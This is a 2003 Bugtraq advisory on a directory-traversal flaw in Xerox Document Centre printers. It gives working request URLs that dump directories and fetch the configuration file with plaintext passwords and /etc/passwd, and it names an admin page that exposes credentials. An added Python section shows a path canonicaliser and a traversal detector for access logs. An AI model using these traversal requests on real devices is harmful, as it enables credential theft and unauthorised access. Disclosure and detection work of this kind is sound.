Security bug in Xerox Document Centre

From: J.A. Gutierrez (spd_at_shiva.cps.unizar.es)
Date: 12/19/03

    Date: Fri, 19 Dec 2003 14:16:57 +0100
    To: bugtraq@securityfocus.com
    
    

    CONTACT INFORMATION
    ===============================================================================

     Name : J.A. Gutierrez
     E-mail : spd@shiva.cps.unizar.es

     Reported this to the vendor on Mon Dec 15 2003 using feedback form
     at http://www.xerox.com, since I couldn't find a security contact.

    TECHNICAL INFO
    ===============================================================================

    Vulnerable systems
    --------------------------------------------------------------

        Xerox Document Centre 470, 255ST and maybe others.
        Software : Xerox_MicroServer
        Version : Xerox11 0.19.5.509
        OS : LynxOS:E2.1_SMP.063.1:02/13/2003

    Impact
    -----------------------------------------

        Remote access to files.
        Access to plaintext passwords for the http administration interface.
        Access to DES passwords for the operating system.
        Read-write access to http users and passwords

    Details
    --------------------------------------------------------------

        The web server software (self-reports as "Xerox_MicroServer/Xerox11")
        on Xerox hardware returns a binary dump of a directory when the
        requested URL ends with "/.." or "/."; so you can easily build the
        directory/file tree from the document root and fetch every file.

        At first it seems you can't get back past the document root, since
        the httpd rejects "../" when it would climb too far:

        GET /../.. -> "The request had invalid syntax."

        But it does accept "../":

        GET /assist/.. -> OK

        So maybe it just counts the "../" groups and compares that count
        to the total number of "/" characters? Let's try:

        GET /assist/////.././../../. -> OK

        Examples:

        - http://xerox_dc_470.example.com/..

    00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
    10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
    20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
    30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
    40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
    50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
    60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

        - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

        and you get the full configuration, including plain text passwords.

        - http://xerox_dc_470.example.com////////../../../../../../etc/passwd

        and you get a passwd file to run crack on.

        Even without using ".." at all, you can get the plain text passwords
        for the HTTP interface using

        http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml

        From that page you can even create new users; pressing the
        "Apply new settings" button prompts for the admin password (the
        same one you have just read on that same page).

        Probably you could use this to steal documents from the printer
        queue, but I haven't verified this.

        Note: to test this vulnerability, do not use a "smart" HTTP client
        that rewrites the URL internally and collapses the '../' components.
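        As an added example (not part of the advisory, and not Xerox code), the
        following shows why a separator-counting check like the one speculated
        about above is unsafe, beside a segment-stack canonicaliser that refuses
        any path climbing above the document root, and applies it to constructed
        access-log lines to flag traversal attempts. The counting heuristic and
        the log lines are assumptions made for illustration.

```python
import re

def naive_accepts(raw_path: str) -> bool:
    # Hypothetical heuristic (an assumption modelled on the advisory's guess):
    # accept when there are fewer ".." groups than "/" separators.
    return raw_path.count("..") < raw_path.count("/")

def canonical_path(raw_path: str):
    """Return the canonical path under the document root, or None if the
    request would escape it. Empty and "." segments are dropped; ".." pops
    one directory and fails when there is nothing left to pop."""
    if not raw_path.startswith("/"):
        return None
    stack = []
    for seg in raw_path.split("/"):
        if seg in ("", "."):
            continue            # "//" and "/." do not change the directory
        if seg == "..":
            if not stack:
                return None     # attempt to climb above the document root
            stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack)

LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def traversal_attempts(log_lines):
    """Return request paths that escape the root, or that carry raw dot
    segments at all (worth alerting on even when they resolve inside the
    root, since ordinary clients collapse them before sending)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        if canonical_path(path) is None or re.search(r"/\.{1,2}(?:/|$)", path):
            hits.append(path)
    return hits

# Constructed sample lines in Common Log Format (not real device output).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Dec/2003:14:16:57 +0100] "GET /assist/index.dhtml HTTP/1.0" 200 512',
    '10.0.0.9 - - [19/Dec/2003:14:17:01 +0100] "GET /assist/////.././../../. HTTP/1.0" 200 96',
    '10.0.0.9 - - [19/Dec/2003:14:17:05 +0100] "GET ////../../data/config/microsrv.cfg HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for p in ("/../..", "/assist/..", "/assist/////.././../../."):
        print(f"{p:28} naive={naive_accepts(p)!s:5} canonical={canonical_path(p)}")
    print("traversal attempts:", traversal_attempts(SAMPLE_LOG))
```

        A path such as "/assist/.." canonicalises to "/", which a server should
        then treat as a directory request (index page or 403), never as a raw
        dump of its on-disk directory structure.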

    Workaround
    ---------------------------------------------------------------------

        - Disable the HTTP interface.
        - Restrict access to trusted hosts only.

    ===============================================================================

    -- 
    finger spd@shiva.cps.unizar.es for PGP      /
    .mailcap tip of the day:                   /             La vida es una carcel
    application/ms-tnef; cat '%s' > /dev/null /           con las puertas abiertas
    text/x-vcard; cat '%s' > /dev/null       /            (A. Calamaro)
    
